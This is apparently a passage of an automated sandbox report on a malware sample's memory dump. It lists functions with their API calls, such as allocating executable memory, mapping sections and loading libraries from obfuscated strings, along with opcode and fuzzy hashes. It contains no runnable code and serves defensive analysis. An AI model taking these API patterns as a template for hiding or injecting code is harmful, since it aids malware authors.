Uniqueness

Uniqueness Score: -1.00%

Function 004322C0 Relevance: 7.8, APIs: 5, Instructions: 267
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0043237C
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 004323CF
RtlAllocateHeap.NTDLL(?,00000000,00000000), ref: 00432474
NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,0000BA00,00003000,00000040), ref: 00432520
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 00432573

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$Allocate$Free$Heap
String ID:
API String ID: 996896184-0
Opcode ID: 2abfef209c03adc6a46efb4df9f87eb1d6f1765a4d6afef3f0960fbdd2a89b35
Instruction ID: 5c95c92c20dc59c6664c2e2f7ecdf8d1e8d1edc756b4fbec66f64321349345c8
Opcode Fuzzy Hash: 2abfef209c03adc6a46efb4df9f87eb1d6f1765a4d6afef3f0960fbdd2a89b35
Instruction Fuzzy Hash: F691AD75108300AFE700CF18C954B5BBBE5FB89728F148A1DF9A89B391D774D909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004226A4 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 657
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A

Strings

kvri, xrefs: 00422C46
ido1, xrefs: 00422C50

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: ido1$kvri
API String ID: 3545744682-1372408504
Opcode ID: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
Instruction ID: b9d25a0b2fa920701055d01af86ece80d2b98a3712395f2c0edf970d086a02d1
Opcode Fuzzy Hash: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
Instruction Fuzzy Hash: AB327D70104B929AE725CF34C594BE3BBE1AF16309F4449ADD0FB8B282D7B9604ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 004226A7 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 645
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D

Strings

kvri, xrefs: 00422C46
ido1, xrefs: 00422C50

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: ido1$kvri
API String ID: 3545744682-1372408504
Opcode ID: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
Instruction ID: aee5f226c6f28335b0b116f7373c29df55dc501608c7967c220329754ed2b793
Opcode Fuzzy Hash: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
Instruction Fuzzy Hash: 6C327C70104B929AE725CF34C594BE3BBE1BF16309F84496DD0FB8B282D7B9604ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 00421FEE Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 624COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A

Strings

kvri, xrefs: 00422C46
ido1, xrefs: 00422C50

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: ido1$kvri
API String ID: 3545744682-1372408504
Opcode ID: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
Instruction ID: 9913d53f075df48d2ed55c36269c1905ce86d6754282f6a88588e489a2a79f56
Opcode Fuzzy Hash: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
Instruction Fuzzy Hash: 57228B70204B529AD725CF34C594BE3BBE1BF16308F84496DD0FB8B282D7B9644ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 00436E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00436F65
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00436FD7

Strings

@, xrefs: 00436EAE
,, xrefs: 00436F3C

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ,$@
API String ID: 292159236-1227015840
Opcode ID: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
Instruction ID: a03adac2527827931d70b2d8102014d7bcc0190a79fe1e5a52ac9dc4f4ed79cd
Opcode Fuzzy Hash: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
Instruction Fuzzy Hash: 0F419EB5108705AFD710DF14C845B5BB7E4FF89328F158A1DF5A89B2E0E3789908CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFD0 Relevance: 6.4, APIs: 4, Instructions: 379nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F07B
NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 0041F0D2
NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F191
NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 0041F1E4

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 3e4e38835c834d50484869e33865e5def73e777b35f3a55f7d1e374b69974ed1
Instruction ID: e0a7e9d02992bacbfa89f012523281f6694a55907a4fe32b1b9819e25999660c
Opcode Fuzzy Hash: 3e4e38835c834d50484869e33865e5def73e777b35f3a55f7d1e374b69974ed1
Instruction Fuzzy Hash: 25D1E1B15083118FE710CF18C84075BBBE1EF85714F14892EF9A987391E3B9D849CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004376C0 Relevance: 6.2, APIs: 4, Instructions: 250nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437765
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004377C3
NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 0043788A
NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 004378E7

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 29316a57d603802fe0d93bdefa50a8f570988c62d58f3bb0f7087f5b643162ce
Instruction ID: a3998fc49f3a29dc41672aef55df02be8577918d35f6a965ab30e23c2c06a20e
Opcode Fuzzy Hash: 29316a57d603802fe0d93bdefa50a8f570988c62d58f3bb0f7087f5b643162ce
Instruction Fuzzy Hash: C3817DB15083119BD720CF18C880B1BBBE5FF88364F148A2DF9D99B3A4D7759905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00416C80 Relevance: 6.1, APIs: 4, Instructions: 116nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416CDF
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00416D29
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416DCF
NtFreeVirtualMemory.NTDLL(000000FF,5C3924FC,?,00008000), ref: 00416E19

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
Instruction ID: 4d9873f1e8f3d9a4bd9b21028fb075ddc7448c9c55893d116057c94cd1fa03ba
Opcode Fuzzy Hash: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
Instruction Fuzzy Hash: CA4159B51087409FE700CF14C844B5EB7E8FB88318F544A2CF6A99B3A0D778D908CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00436FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437145
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004371A2

Strings

@, xrefs: 0043708D

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: @
API String ID: 292159236-2766056989
Opcode ID: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
Instruction ID: 3470ca7a32e557e73fc606eae0d4ee44461d9084059e7f1d5ad2a83f520c0dea
Opcode Fuzzy Hash: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
Instruction Fuzzy Hash: 9D415BB61087049FD710CF14C844B1BB7E4EF89368F559A1DF9A89B3A0E3799908CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00437550 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437655
NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004376A7

Strings

@, xrefs: 004375A2

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: @
API String ID: 292159236-2766056989
Opcode ID: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
Instruction ID: 29f5291566ca971277157fc3e76b40e99f649943cb0cdb06902f21baea30c39a
Opcode Fuzzy Hash: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
Instruction Fuzzy Hash: 5B416DB65087109FD310CF14C844B1BBBE4FB89368F008A2DF9A9A7390D374D9088B97

Uniqueness

Uniqueness Score: -1.00%

Function 004372F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004373A4
NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437403

Strings

$, xrefs: 0043737B

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: $
API String ID: 292159236-3993045852
Opcode ID: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
Instruction ID: 72b04062a4941d8a1ae90bf3d94f17069bde73a1860f2a023997d650316118d9
Opcode Fuzzy Hash: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
Instruction Fuzzy Hash: 36315C75208315AFE720CF14DC40B1FB7E8EB89718F10492DFAA49B390D7759808CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00419C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00419CA1
NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00419D08

Strings

,, xrefs: 00419C78

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID: ,
API String ID: 292159236-3772416878
Opcode ID: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
Instruction ID: 224a45add27236ffddbcf91f67d44791d7106cbfd86a407639e738a615638124
Opcode Fuzzy Hash: 0611d15885a3dbbd9c50aa940e03470727d33db14537f0f80ce13edc545bdf30
Instruction Fuzzy Hash: FC314975208304AFD710CF14DC44B5BBBE9FB89358F148A1DFAA49B390D37598488B96

Uniqueness

Uniqueness Score: -1.00%

Function 004381B0 Relevance: 3.2, APIs: 2, Instructions: 229nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 004382CC
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0043832D

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 4db395416054d4cc4049b443e3b92c02fbf01e1a19c68feb7bea68bb17b0f3a4
Instruction ID: 0e20978d530c16e9394b08b5acea62e704e446e4b6a71f5478531374b9695d52
Opcode Fuzzy Hash: 4db395416054d4cc4049b443e3b92c02fbf01e1a19c68feb7bea68bb17b0f3a4
Instruction Fuzzy Hash: CD81D2755083519FC311CF24C880A2BFBE1BBD9318F598A2DF89987392D774D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00423C16 Relevance: 3.2, APIs: 2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
Instruction ID: 46af719f9938c400c64fdf70310ab0e8678324bcb73df77baa7b064a5f7593ae
Opcode Fuzzy Hash: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
Instruction Fuzzy Hash: 3951B075244B518FD725CF24C814BA2BBF0FF06309F58496DD1EACB292DB79A809CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004371C0 Relevance: 3.1, APIs: 2, Instructions: 94nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437265
NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004372BD

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
Instruction ID: bb41111ea903b26384c474b20ffe10ba7d5028a5dfc9cf92b9ddedf0ce607f6b
Opcode Fuzzy Hash: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
Instruction Fuzzy Hash: 9A315CB5508715AFEB10CF14C844B5FBBE8EB89324F048A2DF9A4973D1D7B49908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004166A7 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0041675C
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 004167B1

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
Instruction ID: 306ac6667e010ce3ca95cf983226b12161baf105d0fbc4103a341dece360a5dc
Opcode Fuzzy Hash: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
Instruction Fuzzy Hash: 74318B756187408FD714CF14C840B5BB7E4BB88318F154A2DF9A59B3A1D774D8048B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00438470 Relevance: 3.1, APIs: 2, Instructions: 87nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0043851F
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00438575

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
Instruction ID: 210a02fd3ac3a9c7de4a2c9f03c2dee55871b0ac6ad3cca68037809ea3fb048c
Opcode Fuzzy Hash: a36230d6e06b83005856d3deb3cb5c7e6891ac8839eccad9719101de5b405186
Instruction Fuzzy Hash: FA317C71108705AFD710DF18DC40B1FBBE5EB89368F118A2DF9A49B3A0D77598098B97

Uniqueness

Uniqueness Score: -1.00%

Function 00415B15 Relevance: 3.1, APIs: 2, Instructions: 84nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00003000,00000040), ref: 00415BF1
NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00415C44

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
Instruction ID: cf38f5e4c694132fec633ddb84a0b2ff5bd7de55ce9f10e3111fc9438b58fcb2
Opcode Fuzzy Hash: f0a65c59f9e647ceb119464e9de520418e1774f71a95882de98c750e2f5e9c81
Instruction Fuzzy Hash: 1F316DB51087408FD724CF14C845B5BB7E4FB89308F104A2CE5AAD73A1D7749909CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004177E0 Relevance: 3.1, APIs: 2, Instructions: 79nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00417988
NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 004179D1

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: df2716ef531c3f950b89538aa79da9d29b97492ac705bdaf5247345fe74575ff
Instruction ID: cc94dc1d494e4ba193adf9cc73b63730f54cdbd5af62b70491121e09dbd35659
Opcode Fuzzy Hash: df2716ef531c3f950b89538aa79da9d29b97492ac705bdaf5247345fe74575ff
Instruction Fuzzy Hash: B72146B52187408FE714CF14C844B5FB7E8BB89318F14892DE6A5CB3A1DB789948CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00415300 Relevance: 3.1, APIs: 2, Instructions: 77nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004153A1
NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004153E5

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
Instruction ID: e5406eb1a83feec3c8a703f7dd689946b4f1a946a6d1207d0dd454413abf4b9b
Opcode Fuzzy Hash: 7a99e40a18b15fb4f451b98af34db27f7cb69718761374f553ae4ff390797268
Instruction Fuzzy Hash: 48218E752087149FD710CF04C884B5FBBE8EB85368F108A2DF9A48B390D37498488B97

Uniqueness

Uniqueness Score: -1.00%

Function 004344DB Relevance: 3.1, APIs: 2, Instructions: 76nativememoryCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00434588
NtFreeVirtualMemory.NTDLL(000000FF,00000010,00000010,00008000), ref: 004345D7

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: MemoryVirtual$AllocateFree
String ID:
API String ID: 292159236-0
Opcode ID: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
Instruction ID: 2057b6f47b01386fa3a202dce32a123e9ae0d3f4901569fb8de3aaefe9a7e00a
Opcode Fuzzy Hash: 7b44a34a4d7dc7ce8f7daef14bb7ea40452adb0ee914cdd49307957870110eeb
Instruction Fuzzy Hash: 7A2148B51083059FE714CF44C854B1BBBE4FB85718F108A1DF6B59B2D0D7B8990C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 00433CF7 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000004,?), ref: 00433D3F

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: OpenSection
String ID:
API String ID: 1950954290-0
Opcode ID: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
Instruction ID: 59f0636a04edb36526bc4193f572342f0fdef4a9ef69ea8737305f1d12902995
Opcode Fuzzy Hash: a1b2d0c6f452ec355e3b7b26032b59bc7b4e9cdc8015fff17ebec047cd84e1d1
Instruction Fuzzy Hash: DFE0E5F8504381BFCB08CF90EC42D367362ABD2B09F10D82CB55042251E6B1AA168F59

Uniqueness

Uniqueness Score: -1.00%

Function 00434D0A Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000002), ref: 00434D4A

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
Instruction ID: 9c132e3696f8a7cc1cfebb2d359e3e28ca7a10dda8dad0fc6a33583830de52bb
Opcode Fuzzy Hash: 1716d2300906b16e18785e5bd46e107ea2ec8003b4fb75253048da8650c948ce
Instruction Fuzzy Hash: 04F030703D83057AF6348B14CC47F6A76A9EB81F10F308719F7616A1E5D9E07D058B49

Uniqueness

Uniqueness Score: -1.00%

Function 004275B6 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0042772C

Strings

F, xrefs: 0042764B
T, xrefs: 0042760B
M, xrefs: 004275DB
I, xrefs: 0042761B
R, xrefs: 004275CB
K, xrefs: 004275EB
, xrefs: 0042765B
C, xrefs: 0042763B
E, xrefs: 0042762B
R, xrefs: 004275FB

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: $C$E$F$I$K$M$R$R$T
API String ID: 2525500382-2695317883
Opcode ID: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
Instruction ID: b65ea5a6236f1d5705806350ce78bc404e8b5f708e5abb6b759b3cc86dbe6bba
Opcode Fuzzy Hash: ee097c0d674727a04bfda02b8a8ac34383e12d03d0d7ddf0e7c78353922365ca
Instruction Fuzzy Hash: 53519D7450D7C0CEE771CB28C49879BBBE0AB96308F04895DD4DC8B382C7BA95499B57

Uniqueness

Uniqueness Score: -1.00%

Function 00434917 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 121
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00434B07

Strings

U)X/, xrefs: 00434A68
U)X/, xrefs: 0043496C
V98?, xrefs: 0043498C
V98?, xrefs: 00434A88
R5X;, xrefs: 00434A80
C%R+, xrefs: 004349D8
R5X;, xrefs: 00434984
C%R+, xrefs: 00434AD8

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: C%R+$C%R+$R5X;$R5X;$U)X/$U)X/$V98?$V98?
API String ID: 1029625771-17140411
Opcode ID: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
Instruction ID: 21bab591ecebe4fef30b80bc6ab6cda11f35366661598b552c3bc5dc332ec003
Opcode Fuzzy Hash: b415310fc35505e012fbe591ffe0cefd97b98ee7380ce86a4f411c1e097ee61d
Instruction Fuzzy Hash: CA517EB4509301AFD704CF10E9A072FBBF1FB8AB08F14992DE49957262D734D945DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00433F74 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00434B07

Strings

U)X/, xrefs: 00434A68
V98?, xrefs: 00434A88
R5X;, xrefs: 00434A80
C%R+, xrefs: 00434AD8

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: C%R+$R5X;$U)X/$V98?
API String ID: 1029625771-2675831890
Opcode ID: 8e1a4ce2a09d512d88441af55b70a62b48b6dae6c781d40d5880f1a539daa340
